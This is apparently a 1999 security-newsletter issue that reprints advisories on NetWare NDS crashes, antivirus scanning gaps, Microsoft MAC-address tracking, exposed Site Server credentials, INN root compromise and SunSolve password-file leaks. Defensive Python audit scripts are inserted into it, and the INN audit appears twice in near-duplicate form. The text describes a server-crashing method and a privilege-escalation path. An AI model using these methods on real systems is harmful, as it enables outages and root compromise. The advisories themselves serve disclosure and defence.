downtime that has a Directory Services replica on it. Normally this can be
corrected by increasing RAM or lowering the amount of transactions tracked
from the maximum default of 10,000 down to say 5,000 by issuing the command
SET MAXIMUM TRANSACTIONS = 5000 at the console or via ServMan, and enabling
TTS by typing ENABLE TTS at the console.
However, a malicious user with proper access can force the memory depletion
and potentially crash a server that has a replica of the NDS database. This
can lead to multiple near-simultaneous server crashes.
Of course anyone with administrative access can do this, but they could
obviously do other acts that could be just as destructive, if not more so.
What is needed is the ability to create a large number of NDS updates very
quickly. For example, if a user has the ability to create a container and
add objects to it, then that user has enough authority to potentially cause
problems to TTS. Creating a container, dropping a few hundred objects into the
container via drag-and-drop and then deleting the container should suffice.
If the server lacks a large amount of free memory, the server will quite
possibly abend. In other cases, TTS is disabled, which is a form of Denial of
Service. As the messages are sent across to other servers containing NDS
replicas, they too may crash. In our test environment we were able to crash
two servers (Netware 4.1 and Netware 4.11) with the scenario of creating a
container, adding a few hundred users, and then deleting the container.
Solution/Workaround
-------------------
NMRC has heard reports of as many as a dozen servers crashing within a couple
of minutes of each other, so apply the latest Service Pack for Netware 4.x on
all servers or upgrade to Netware 5.
Comments
--------
Novell has already been notified and they are obviously aware of the TTS
limitations (refer to the May 1997 TID 2908153 at
http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example).
Per Novell the latest patches for Netware 4.x correct the problem, and Netware
5 does not have the problem at all.
Thanks to Michel Labelle <divebc@hotmail.com> for notifying NMRC about this
problem.
_______________________________________________________________________________
See http://www.nmrc.org/news/ for more advisories.
Simple Nomad //
thegnome@nmrc.org // ....no rest for the Wicca'd....
www.nmrc.org //
@HWA
04.0 InoculateIT for Windows NT 4.53 scans inbox but misses other inbound msgs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 12 May 1999 09:52:59 -0500
From: Bob Duffett <Bob.Duffett@CCC.UAB.EDU>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: InoculateIT 4.53 Real-Time Exchange Scanner Flawed
Manufacturer: Computer Associates
Product: InoculateIT for Windows NT v4.53 Build 169, Agent for
Microsoft Exchange
This product has a major defect.
We have it running on our Exchange Server
with 1,300 mailboxes yet viruses keep spreading directly from email. I
did some investigating tonight and found the problem.
It is ONLY scanning the Inbox folder tree. This would sound simply like
a poor design but it is MUCH worse.
The Inbox Rules Wizard can store the user's rules on the Exchange Server
which will move a message to a specific folder without the message ever
being placed in a user's inbox. This causes it to completely bypass the
InoculateIT Real-Time Scanner.
My CA rep confirmed the problem with CA support who had no work-around
available at this time.
Bob
University of Alabama at Birmingham
Cancer Center Technical Services Facility (CCTSF)
mailto:Bob.Duffett@ccc.uab.edu
@HWA
04.1 CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sat, 8 May 1999 14:58:08 +1000
From: Glenn Corbett <Glenn.Corbett@bigpond.com>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Insecure Behaviour in Inoculan Client
Russ,
A problem has been discovered with the InocuLAN client on Windows NT
workstations. If an account lockout policy is present on a Windows NT
domain, large numbers of repeating account lockouts can occur.
Description: Incorrect password events (event id 529) are being logged from
workstations when running applications from UNC paths. The username that
has logged the incorrect password is different to that of the logged on
user.
Configuration: Windows NT workstation SP3 or SP4, with InocuLAN V4.0(373) or
InocuLAN V4.0(375)
To reproduce the problem:
1. Install InocuLAN V4.0(373) or V4.0(375) onto an NT workstation with
SP3 or SP4 (SP5 not tested yet)
2. Configure InocuLAN as described below:
Options:
Direction - Incoming and Outgoing files
Action upon Virus detection - Cure File
Cure Action for Macro Viruses - Remove Infected Macros
Copy File before Cure
Rename File when Cure Fails
Rename Extension - AVB
Move Directory - C:\Inoculan\VIRUS
Protected Areas:
Protect Floppy Drives
Protect Network Drives
Protect CD-ROM Drives
Scan Type - Secure Scan
3. Reboot the workstation
4. Log into WorkstationA as Domain UserA, Logout Domain UserA
5. From another workstation change the password of Domain UserA
6. Log into WorkstationA as Domain UserB.
7. From WorkstationA run an application from a remote share on WorkstationX
where Logon and Logoff, Success/Failure, are being audited. Run an
application from the cmd window using a UNC path with no other connections
to the WorkstationX. Eg \\WorkstationX\shareX\notepad
8. The application will take several seconds to run and there will be a
failure security event (529) for UserA from Workstation A. From server
manager remotely stop the Cheyenne InocuLAN Anti-Virus Server on Workstation
A and repeat step 7. You will see that the application will start
immediately and no errors will be recorded in the security event log.
The above problem also causes problems when running logon scripts. If an
application is called from the logon script and that application does not
exit on the local workstation, the version in the logon share will be run.
As soon as the application in the logon script is called there is an event
529 error recorded on the logon server security event log.
Even if subsequent different users log into Workstation A, these problems
will continue until the workstation is rebooted.
This behaviour can also be seen if in Step 4, a local userA logs on. The
subsequent error 529's have the local userA account in the security event.
It appears as though InocuLAN is storing the user credentials for the first
logged on user and using them to scan network drives for viruses even when a
different user subsequently logs on until workstation reboot. It is not yet
apparent if this username / password is being stored in the registry /
temporary file or memory, and therefore open to exploit.
We do not see this problem with InocuLAN V4.0 (4.0 Service Pack 1).
CA have been notified earlier this week, no response as yet.
Thanks
Glenn Corbett
CRISP Project Server / Workstation Team Leader
Compaq Computer Corp, Australia.
Glenn.Corbett@compaq.com (Work)
Glenn.Corbett@bigpond.com (Private)
--------------------------------------------------------------------------------
Date: Fri, 14 May 1999 14:49:17 -0400
From: ARCNT <ARCNT@CAI.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: NTBUGTRAQ response - URGENT
The issue reported to NTBUGTRAQ regarding InocuLAN v4.0 build 373 and 375
implies that username/password information is stored "somewhere" on the
client side and as such could potentially be exploited.
That assertion is inaccurate: the username/password credential combination
is NOT stored on the client side by Inoculan (which is why the efforts to
locate these credentials in shared memory, in a file or in the registry have
been unsuccessful).
Clearly, in order for the InocuLAN real-time scanner to access files on a
remote server, the software must have valid security contexts in place to
permit the requisite access to the file systems and files.
The techniques utilized by Inoculan (using low level, but fully documented
and supported standard vendor API's) do NOT require that traditional user
credentials (user account/password) be presented in order to gain the
necessary access.
Rather, Inoculan is able to gain the required access in a completely
secure manner without prompting for username and password information.
In addition, it is important to point out that NO attempt to retrieve
credential data is done without the user's explicit advance knowledge and
consent.
Computation/generation of the requisite credential information is done at
Inoculan driver initialization time, and can be easily refreshed by simply
rebooting the machine (which of course will in turn result in Inoculan
initialization routines being invoked as part of system restart).
The particular behaviour observed and reported can be attributed to the
fact that AFTER Inoculan initialization was completed, the user access
credentials for the user in question were modified, rendering the
originally computed credential that Inoculan would otherwise utilize
invalid.
An enhancement is being developed presently to provide a configuration
setting that will instruct the Inoculan real-time scanner to recompute
credentials automatically, thus eliminating the need to reboot the client
machine.
This enhancement will be available by 17:00 Eastern US time, May 21, 1999,
and can be downloaded from the standard Computer Associates support web
sites (http://support.cai.com).
We appreciate the efforts involved in bringing this issue to our attention
and look forward to being able to provide you continued responsive service
in the future!
InocuLAN Technical Support
@HWA
05.0 [ISN] Everywhere your MAC address shows up
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 11 May 1999 21:55:22 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Everywhere your MAC address shows up
Forwarded From: <anonymous>
MICROSOFT'S HEAVY HAND IN THE COOKIE JAR
A special report from YEOW - Barry Simon.
See the Woody's Office Watch discussion and details on the Office 97
privacy problem. Issues 4.11 and 4.12
Because of the important Internet Explorer 5 coverage some regular WWW
features have been held over to the next issue.
We reported earlier on the brouhaha over the inclusion of hardware IDs in
the Pentium III chip and privacy advocates' concerns about it. Turns out
many of us already have hardware IDs on our systems since all Ethernet
cards have a MAC (stands for 'Media Access Control', whatever that
means!), a six byte ID number that networks need to be sure to properly
direct network packets. Of course, the Pentium III ID's are more serious
since many home systems don't (yet) have network cards and the biggest
privacy concerns are in the consumer space.
Due to wonderful sleuthing by Richard Smith of PharLap (who earlier
located the April Fool's Bug discussed in WWW issue 2.2), the world has
discovered a number of places that Microsoft has been using these MACs -
in Windows 98 IDs, in Office 97 documents and in the microsoft.com
cookies. And privacy concerns result from all these uses.
To understand the issues, try a few experiments. First, you'll need your
MAC assuming you have an Ethernet adapter. With Windows 9x, run the
program winipcfg from the Run box. It should load with a dropdown that
says 'PPP Adapter'. Change the dropdown to the name of your hardware
adapter. The Adapter Address field will say something like
00-70-06-9A-8E-43. That's your MAC. Each byte is presented as two hex
digits (0 through 9 or A-F) for a 12 character ASCII string which is what
Microsoft uses. With Windows NT, run instead winmsd, go to the Network
tab and pick Transports and you'll get the MAC.
For the next experiment, you'll need to look at a Word 97 document in text
mode. You can't do this with Word. If you have Quick View Plus (plain
Quick View won't do), open a Word doc in QVP, go to the View menu and pick
View as Text. Or make a small Word doc, save it and rename it to a .txt
extension and open it in Notepad. Now search for the string PID. You
should find _PID_ GUID and shortly afterwards, a long hex string inside
braces such as {F96EB3B9-C9F1-11D2-95EB-0060089BB2DA}. Those 12 hex digits
at the end will be your MAC. Yup, every Word doc, every Excel spreadsheet
and every Power Point presentation is branded with an identifier showing
the PC it came from. If your boss has a Word memo you sent her and a copy
of the anonymous whistle blowing attachment you sent to the Feds, she
could determine they were made on the same machine. (Of course, if you
aren't careful, the document includes an author name and if any
corrections were made, it may say who made the corrections. Within the
next few days, Microsoft expects to post a white paper on all the
'metadata' embedded in Office documents).
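The article says where the MAC sits in the GUID but not how to read it back out. The following is an added example (not code from the article, Microsoft or PharLap): it decodes the version-1 GUID quoted above and scans constructed document bytes for branded GUIDs so you can audit your own files; the sample bytes and the second (version-4) GUID are constructed.

```python
import re
import uuid
from datetime import datetime, timedelta, timezone

# Added example, not code from the article. A version-1 GUID (RFC 4122
# time-and-node layout, the kind Office 97 wrote into _PID_GUID) carries
# a 48-bit node field; on a PC with an Ethernet adapter that is the MAC.

GUID_RE = re.compile(r"\{?([0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-"
                     r"[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12})\}?")

# Version-1 timestamps count 100 ns ticks from the Gregorian reform date.
UUID_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def describe_guid(text):
    """Describe a GUID string; returns None when it is not version 1.

    Only version 1 embeds a node; a random (version 4) GUID identifies
    no hardware, so nothing can be recovered from it."""
    m = GUID_RE.fullmatch(text.strip())
    if m is None:
        raise ValueError("not a GUID: %r" % text)
    u = uuid.UUID(m.group(1))
    if u.version != 1:
        return None
    node = u.node
    # RFC 4122: a generator with no adapter sets the multicast bit of the
    # first node octet; a real IEEE 802 address always has it clear.
    hardware_mac = ((node >> 40) & 1) == 0
    mac = "-".join("%02X" % ((node >> (8 * i)) & 0xFF)
                   for i in range(5, -1, -1))
    created = UUID_EPOCH + timedelta(microseconds=u.time // 10)
    return {"mac": mac, "hardware_mac": hardware_mac, "created": created}


def find_branding(blob):
    """Scan raw document bytes and map every GUID found to its description.

    Office 97 property sets store strings as either 8-bit or UTF-16LE text,
    so both decodings are tried (UTF-16 at both byte alignments)."""
    texts = [blob.decode("latin-1")]
    for offset in (0, 1):
        texts.append(blob[offset:].decode("utf-16-le", errors="ignore"))
    hits = {}
    for text in texts:
        for m in GUID_RE.finditer(text):
            key = m.group(1).upper()
            if key not in hits:
                hits[key] = describe_guid(key)
    return hits


# Constructed sample: the OLE2 signature, a UTF-16LE _PID_GUID property
# holding the GUID quoted in the article, and an unrelated version-4 GUID
# stored as plain ASCII.
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8
    + "_PID_GUID".encode("utf-16-le") + b"\x00\x00"
    + "{F96EB3B9-C9F1-11D2-95EB-0060089BB2DA}".encode("utf-16-le")
    + b"\x00" * 4
    + b"{0C2F1E7A-5B6D-4E8F-9A1B-2C3D4E5F6A7B}"
)

if __name__ == "__main__":
    for guid, info in find_branding(SAMPLE_DOC).items():
        if info is None:
            print(guid, "-> version 4, no hardware identity")
        else:
            print(guid, "-> node %s (real MAC: %s), generated %s" %
                  (info["mac"], info["hardware_mac"], info["created"].date()))
```

Run against a real .doc by replacing SAMPLE_DOC with the file's bytes; a hit whose hardware_mac is True is a document branded with an adapter address.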
To run the next experiments, you'll need Windows 98, so I'll tell you what
happens so you can follow along in any event. In your Windows directory,
you'll find a file called reginfo.txt. Open it in Notepad and look for a
line called HWID; it ends with your MAC. This file is created when you
install Windows and is transmitted to Microsoft when you register. And
here's the clincher: even if you check the box not to send hardware
information, this data is sent. And it's even worse - the data collection
code is in an ActiveX control that can be used by any Internet site out
there. Pharlap has a demo to illustrate this: go there and it displays
your MAC on screen. Any site knowing of this control could track MACs of
all Windows 98 visitors to their sites. There is also a demo and
discussion at Windows Magazine. By the way, this ActiveX control is also
in the Windows 2000 beta so if Microsoft hadn't been found out, NT users
would have been hit next.
Next, go to your cookies directory and open the text file whose name ends
with microsoft.txt (it probably has a username@ in front where username is
your login name). In it you'll find a string called GUID that includes
your MAC (GUID, by the way, is short for Global Unique Identifier). This
cookie is sent to www.microsoft.com every time you visit that site. You
may have realized they were making a cookie when you registered at their
site but I bet you didn't realize they were adding hardware information
without your permission. (Actually the Win98 Registration Wizard made the
cookie before you went to the Microsoft site.)
You might want to search your Registry for your MAC as a string. I found
mine numerous times - two in suspicious places vis-a-vis Microsoft. It's
part of a key for Media Player called Client ID (is this passed on to the
Media Player servers?) and as part of a key HKCU\Identities that seems to
be connected with Outlook Express 5.0.
There is certainly plenty here for the paranoid. Microsoft is collecting
and storing in its databases unique hardware information. That
information brands your documents, and is always sent on when you access
Microsoft's site. One has to consider the possibility that Microsoft is
keeping some master database tracking all sorts of interactions based on
your MAC. And one has to allow the possibility that the MAC will be
encoded in the information that is sent by the Office Registration Wizard
in Office 2000.
Microsoft has reacted vigorously to the developments in this story. They
have two customer letters ( here and here) on their site in which they
promise to remove the hardware ID part of the registration wizard in a
Win98 upgrade. They also promise to delete 'any hardware ID information
that may have been inadvertently gathered without the customer having
chosen to provide Microsoft with this information.' Tools have already
been posted to remove branding from Office applications and from
already-created docs and there is a promise that branding will be removed
from the final version of Office 2000.
Beyond these actions, there has been a full court spin operation. Some MS
representatives have (unwisely in my opinion) attempted to minimize the
issue. There have been claims that the doc branding was a part of a
feature, never implemented, intended solely to help network administrators.
There has been harping on the fact that the MAC only identifies a machine
but not an individual - true but not of much comfort in many cases. We've
been told that Windows 98 sending a HWID even if you said not to send
hardware information was a bug, not a feature - an inadvertent programming
error. There's been no new statement about the use of MACs in cookies
which I find most disturbing.
We've been told by Microsoft representatives that the Office 2000
Registration Wizard doesn't collect MACs or anything like a MAC. Indeed,
they claim that while the Office CD serial number can be reconstructed
from the 16 byte code sent by the wizard, the hardware info does not allow
reconstruction. In particular, if the different CDs were used on the same
machine, they'd be unable to tell that the codes came from the same
machine.
_____
The problem with the Microsoft position is that the company has so little
credibility and there is too much of a pattern here. We pride ourselves
on taking a middle road on Microsoft at Woody's newsletters. We don't
hesitate to put their feet to the fire but, on the other hand, we don't
take the position that Microsoft is the root of all evil and everything
they say and do is two faced. That said, Woody's middle name isn't Polly
and mine isn't Anna. Microsoft has amply demonstrated that it is company
policy to, er, shade the truth when doing so serves a perceived business
purpose. We see it in the leaked disinformation about Windows 2000
shipping this fall, we've seen it in their previous reactions to
accusations and we saw it too often in the testimony at the DOJ trial.
That means one has to take skeptically every statement that Microsoft has
made about the MAC problem. I'm inclined to believe that branding of
Office documents wasn't part of a plot to link together our entire lives
in Microsoft's databases. But I'm insulted that they try to bat their
eyelashes and claim to us that the sending of the HWID even when you told
them not to send hardware info was an inadvertent error. And I'm
concerned that we have no way of knowing that they've kept their promise
to remove hardware IDs from their internal databases. Indeed, my
presumption is that they will not.
I worry that Microsoft is tucking all sorts of things into the holes they
aren't discussing. While they have said they'll stop using HWID, they
have also said they'll continue to use the MSID number which is created by
the Windows 98 Registration wizard. And, guess what? As discovered by
Peter Siering at the German publication C'T Magazine, the registration
wizard also creates a Microsoft cookie that includes MSID. So even after
the apologies and changes, it seems Microsoft will be quite capable of
tracking us and linking online visits to registration information.
It's interesting about credibility. There was also an Intel slip reported
recently that they claimed was inadvertent. Apparently some mobile
Pentium II's shipped with hardware IDs even though these were only
announced for Pentium III's. Intel's explanation is that they experimented
with this feature in the manufacturing process for the mobile Pentium II
but it was supposed to be disabled before shipping. One line
inadvertently didn't do the disabling. Intel's credibility is such that
I'm willing to accept their claim of inadvertence here.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
06.0 [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 11 May 1999 16:27:38 -0600
From: Mark <mark@NTSHOP.NET>
To: BUGTRAQ@netspace.org
Subject: [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs
====================================================
Site Server's AdSamples Directory Reveals ID and PSW
Discovered by Andrey Kruchkov
====================================================
VERSIONS AFFECTED
* Tested on Microsoft Site Server 3.0 Commerce Edition
DESCRIPTION
Site Server allows the installation of an AdSamples directory, which serves
to demonstrate the capabilities of the Ad Server component. If this
directory is installed and left open to the public without limiting
directory permissions, a user can obtain a site configuration file
(SITE.CSC) that contains sensitive information pertaining to an SQL
database. This information could contain a DSN, as well as a username and
password used by the Ad Server to access the SQL server database.
COMMENTS
Andrey reported this problem to NTSECURITY.NET and has informed Microsoft of
this issue.
Andrey points out an easy way to eliminate this risk:
Remove the "AdSamples" virtual directory from the DEFAULT root Web site, or
change security permissions for this folder to sufficiently restrict access.
If you must provide loose access to this virtual directory for some strange
reason, then you should at least adjust the security permissions for the
SITE.CSC file so that it's not available for viewing. Also keep in mind that
there may be numerous other SITE.CSC files under your Site Server
installation, all of which need to be secured.
For a URL that demonstrates the problem, please visit
http://www.ntsecurity.net/scripts/loader.asp?iD=/security/siteserver-2.htm
This is probably a great time to remind people once again to NEVER install
sample content on production servers and to NEVER use the built-in IIS
DEFAULT Web site without first thoroughly investigating the implications of
doing so.
Thanks,
Mark - http://www.ntsecurity.net
@HWA
07.0 inndstart vulnerability, possible root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 11 May 1999 11:24:06 -0400
From: Forrest J. Cavalier III <mibsoft@mibsoftware.com>
Reply-To: userkt-l@mibsoftware.com
To: BUGTRAQ@netspace.org
Subject: INN 2.0 and higher. Root compromise potential
Copyright 1999 Forrest J. Cavalier III, Mib Software
This information is provided by Mib Software, www.mibsoftware.com.
This notice can be distributed without limitation.
Summary:
--------
INN is open source NNTP (Usenet) server software from the Internet
Software Consortium. http://www.isc.org/
In some cases, there is potential for the local news user,
or any local user, to execute arbitrary code as root.
The two vulnerabilities reported below have already been
discussed in the Usenet newsgroup news.software.nntp.
Therefore, the vendor is being sent this notice now, and
was not notified previously.
INN is communications software. Mib Software knows of
no buffer overrun exploits of the affected versions of
INN, but the possibility cannot be ruled out. This would
be the only way a root compromise using a remote connection
would be possible.
Background:
-----------
Since NNTP defines a privileged port (119), a SUID root
wrapper, inndstart, binds to the port, and then is
intended to drop root privileges, setting the UID to user
news before exec() innd. In some cases, this behavior
can be altered to gain privileges.
------------------------------------------------------------
Vulnerability 1 (pathrun should not be trusted information)
------------------------------------------------------------
Summary: It is possible for the news user to control the behavior
of the inndstart program so that root privileges are not
dropped, and execute arbitrary programs as root.
Versions affected: INN 2.0 and higher.
Versions not affected: INN 1.7.2 and lower.
Details: inndstart determines the target UID and GID from
the UID and GID of a directory which is normally owned
by user news, group news. The directory which is checked
can be changed by editing the "pathrun" parameter
in the inn.conf configuration file.
By specifying a directory with appropriate ownership, inndstart
can exec() running as any user, including root.
During the course of normal operation, innd forks() and executes
many child processes, and it is relatively simple to run arbitrary code
from innd.
Solution: modify the source file innd/inndstart.c to use a
hard coded pathrun, instead of the structure member
innconf->pathrun.
Workaround: There is no workaround. The source must be modified.
------------------------------------------------------------------
Vulnerability 2 (inndstart should be protected,
INNCONF environment variable should not be trusted.)
------------------------------------------------------------------
Versions affected: INN 2.x after July 9, 1998 (including INN 2.1
and higher.)
Versions not affected: INN 1.7.2 and lower.
Details: Normally, the SUID root program inndstart, should be
in a directory accessible only by user news. In some
installations, this program is accessible to all local users.
On July 9, 1998 a source code change was introduced which
obtains the path of the configuration file from the environment
variable INNCONF. In those installations with inndstart
accessible to local users, a local user can set INNCONF in the
environment and determine the behavior of inndstart
so that arbitrary programs are executed.
If the pathrun vulnerability above is fixed, these programs run as
user news, if not fixed, they run as user root.
Solution: Install inndstart in a directory with 0700 permissions
owned by user news.
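The two conditions the advisory ends on (inndstart living in a 0700 directory owned by news, and pathrun resolving to a directory owned by news rather than root) are easy to audit from the defender's side. The script below is an added example, not Mib Software's or INN's code; the uid/gid values and stat records it feeds itself are constructed.

```python
import os
import stat
from collections import namedtuple

# Added example, not from INN or Mib Software. Audits an INN 2.x install for
# the conditions the advisory describes. The checks take stat-like records
# rather than paths so they can be exercised on constructed values;
# audit_install() wraps them with real os.stat() calls.

OwnerInfo = namedtuple("OwnerInfo", "st_mode st_uid st_gid")  # os.stat_result subset


def dir_info(perm, uid, gid):
    """Build a stat-like record for a directory with the given permission bits."""
    return OwnerInfo(stat.S_IFDIR | perm, uid, gid)


def check_install_dir(st, news_uid):
    """Findings for the directory that holds the SUID-root inndstart binary.

    Vulnerability 2: any local user who can reach inndstart can set INNCONF
    and pick its configuration, so the directory must be 0700, owned by news."""
    if not stat.S_ISDIR(st.st_mode):
        return ["inndstart parent is not a directory"]
    findings = []
    if st.st_uid != news_uid:
        findings.append("inndstart directory not owned by news (uid %d)" % st.st_uid)
    perm = stat.S_IMODE(st.st_mode)
    if perm & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append("inndstart directory is group/world accessible (mode %o);"
                        " want 0700" % perm)
    return findings


def check_pathrun(st, news_uid, news_gid):
    """Findings for the pathrun directory, whose owner becomes innd's UID/GID.

    Vulnerability 1: inndstart switches to the owner of this directory, so a
    root-owned (or otherwise repointed) pathrun means privileges never drop."""
    if not stat.S_ISDIR(st.st_mode):
        return ["pathrun is not a directory"]
    if st.st_uid == 0 or st.st_gid == 0:
        return ["pathrun owned by root: innd would keep root privileges"]
    if (st.st_uid, st.st_gid) != (news_uid, news_gid):
        return ["pathrun owned by uid %d gid %d, expected news"
                % (st.st_uid, st.st_gid)]
    return []


def check_environment(environ):
    """INNCONF must never come from the environment of an untrusted caller."""
    if "INNCONF" in environ:
        return ["INNCONF=%s is set; inndstart would honour it" % environ["INNCONF"]]
    return []


def audit_install(inndstart_path, pathrun, news_uid, news_gid, environ=os.environ):
    """Run every check against a live installation; returns a list of findings."""
    findings = []
    try:
        findings += check_install_dir(os.stat(os.path.dirname(inndstart_path)), news_uid)
    except OSError as e:
        findings.append("cannot stat inndstart directory: %s" % e)
    try:
        findings += check_pathrun(os.stat(pathrun), news_uid, news_gid)
    except OSError as e:
        findings.append("cannot stat pathrun: %s" % e)
    findings += check_environment(environ)
    return findings


if __name__ == "__main__":
    # Constructed records: a world-readable 0755 bin directory and a pathrun
    # that has been repointed at a root-owned directory.
    NEWS_UID, NEWS_GID = 9, 13  # constructed ids for user/group news
    bad_bin = dir_info(0o755, NEWS_UID, NEWS_GID)
    root_run = dir_info(0o755, 0, 0)
    for f in (check_install_dir(bad_bin, NEWS_UID)
              + check_pathrun(root_run, NEWS_UID, NEWS_GID)):
        print("FINDING:", f)
```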
-------------------------------------------------------------------
Forrest J. Cavalier III, Mib Software, INN customization and consulting
'Pay-as-you-go' commercial support for INN: Only $64/hour!
Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages.
http://www.mibsoftware.com/innsup.htm
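A defender's check for the two conditions the advisory describes, added here as an example (it is not Mib Software's code and not part of the advisory): it verifies that inndstart lives in a 0700 directory owned by the news account and that the pathrun directory is owned by news:news, so inndstart is never handed root as its target. The paths, the account name and the demo layout are assumptions.

```python
import os
import pwd
import shutil
import stat
import tempfile


def news_ids(account="news"):
    """Resolve the news account to (uid, gid); on a real host pass the
    result to audit_inndstart(). The account name is an assumption."""
    pw = pwd.getpwnam(account)
    return pw.pw_uid, pw.pw_gid


def audit_inndstart(inndstart_path, pathrun, news_uid, news_gid):
    """Return a list of findings for the two inndstart issues; [] means clean."""
    findings = []

    # Vulnerability 2: inndstart must sit in a directory only user news can
    # enter (mode 0700, owned by news), so other local users cannot run it
    # with an INNCONF of their choosing.
    bindir = os.path.dirname(os.path.abspath(inndstart_path))
    st = os.stat(bindir)
    mode = stat.S_IMODE(st.st_mode)
    if st.st_uid != news_uid:
        findings.append(f"{bindir}: owned by uid {st.st_uid}, not the news account")
    if mode & 0o077:
        findings.append(f"{bindir}: mode {mode:04o}, should be 0700")

    # Vulnerability 1: inndstart takes its target UID/GID from the owner of
    # pathrun, so pathrun must be owned by news:news; root ownership means
    # root privileges are never dropped.
    st = os.stat(pathrun)
    if st.st_uid != news_uid or st.st_gid != news_gid:
        who = "root" if st.st_uid == 0 else f"uid {st.st_uid}/gid {st.st_gid}"
        findings.append(f"{pathrun}: owned by {who}, should be news:news")
    return findings


def demo():
    """Constructed layout under a temp dir, with the current account standing
    in for news: audited once correct, then after the bin directory has been
    opened up to mode 0755 (the exposed inndstart of Vulnerability 2)."""
    uid, gid = os.getuid(), os.getgid()
    top = tempfile.mkdtemp(prefix="inn-audit-")
    try:
        bindir, pathrun = os.path.join(top, "bin"), os.path.join(top, "run")
        os.mkdir(bindir, 0o700)
        os.mkdir(pathrun, 0o770)
        os.chown(bindir, uid, gid)
        os.chown(pathrun, uid, gid)
        inndstart = os.path.join(bindir, "inndstart")
        open(inndstart, "w").close()
        clean = audit_inndstart(inndstart, pathrun, uid, gid)
        os.chmod(bindir, 0o755)
        exposed = audit_inndstart(inndstart, pathrun, uid, gid)
    finally:
        shutil.rmtree(top, ignore_errors=True)
    return clean, exposed


if __name__ == "__main__":
    clean, exposed = demo()
    print("correct layout:", clean or "OK")
    print("0755 bin dir:  ", exposed)
```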
@HWA
08.0 Sunsolve database leaks crucial info about itself and its users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 11 May 1999 19:22:59 +0100
From: "Robson, Ken" <RobsonK@EBRD.COM>
To: BUGTRAQ@netspace.org
Subject: Sun Microsystems Leaks extensive Amounts of Information About Itself
& It's Customers Through Its Sunsolve Database...
Hi Folks,
I have just been scouring Sun's Bug Reports for some information and I
discovered that you can easily trawl for useful information about both Sun
and its clients. Information exposed includes:
* Copies of /etc/passwd (i.e. user names)
* Copies of /etc/shadow (i.e. encrypted passwords)
* Configuration of network services (i.e. inetd.conf)
It is trivial to put together searches that glean this for some of their
customers. Whilst the contract services restrictions are in place for
accessing these accounts, logins must be in wide circulation. I know 3 or 4
accounts from various past employers myself.
When logging a support call I do not often consider what might happen to the
call notes. I am sure that Sun are not the only company doing this and this
is not aimed at Sun in particular, they are just an example. Serious
consideration should be given to what information you are prepared to pass
to those who support you - do you trust the rest of their customers (at
best) or the entire internet (at worst)?
Anyway, not earth-shattering but food for thought.
Regards,
Ken.
PS - Please do not interpret the domain that this mail comes from as any
indication that I work for the European Bank for Reconstruction &
Development. I in fact contract to Hewlett Packard and am simply based at
the bank - all the opinions expressed above are my own and have nothing to
do with either of these organisations.
-----------------------------------------------------------------------------
Date: Wed, 12 May 1999 09:56:00 -0700
From: Alan Coopersmith <alanc@GODZILLA.EECS.BERKELEY.EDU>
To: BUGTRAQ@netspace.org
Subject: Re: Sun Microsystems Leaks extensive Amounts of Information About Itself & It's Customers Through Its Sunsolve Database
> When logging a support call I do not often consider what might happen to the
> call notes. I am sure that Sun are not the only company doing this and this
> is not aimed at Sun in particular, they are just an example. Serious
> consideration should be given to what information you are prepared to pass
> to those who support you - do you trust the rest of their customers (at
> best) or the entire internet (at worst).
The actual service order notes are not available to customers through SunSolve
- but parts of bug reports that may be generated by them are. At least a few
years ago when I worked in SunService they reminded us not to put customer
information in the public part of bug reports, but there was no review system
to make sure we didn't screw up. If you want to protect yourself, make sure
that if your call results in a bug report you go to SunSolve and review the
public copy to make sure there's nothing in there you wouldn't want others to
see and if there is, call up your service rep and make them move it to the
sun-internal-access-only section of the bug report.
Disclaimer: I no longer work in Tech Support at Sun and do not and cannot
speak for SunService or whatever they're called after the latest "realignment
of the Sun planets".
--
________________________________________________________________________
Alan Coopersmith alanc@godzilla.EECS.Berkeley.EDU
Univ. of California at Berkeley http://soar.Berkeley.EDU/~alanc/
aka: alanc@{CSUA,OCF,CS,BMRC,EECS,ucsee.eecs,cory.eecs}.Berkeley.EDU
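As an added example (not part of either post): a pre-submission scrub of support-call notes in the spirit of the advice above, which finds /etc/passwd, /etc/shadow and inetd.conf records pasted into case text and redacts account names and password hashes before the text leaves the company. The sample notes are constructed; the record layouts assumed are the 7-field passwd format and the 9-field Solaris shadow format.

```python
import re

# Constructed sample of support-call notes (not real data): a customer pasted
# password-file records and an inetd.conf entry straight into the case text.
SAMPLE_NOTES = """\
Customer cannot log in after the patch cluster. Files from the box:
root:x:0:0:Super-User:/:/sbin/sh
jdoe:x:1001:10:J. Doe:/export/home/jdoe:/bin/ksh
root:ab7QxR1kLmNoP:10800::::::
jdoe:zzT9vW3kQpLmN:10800:7:90::::
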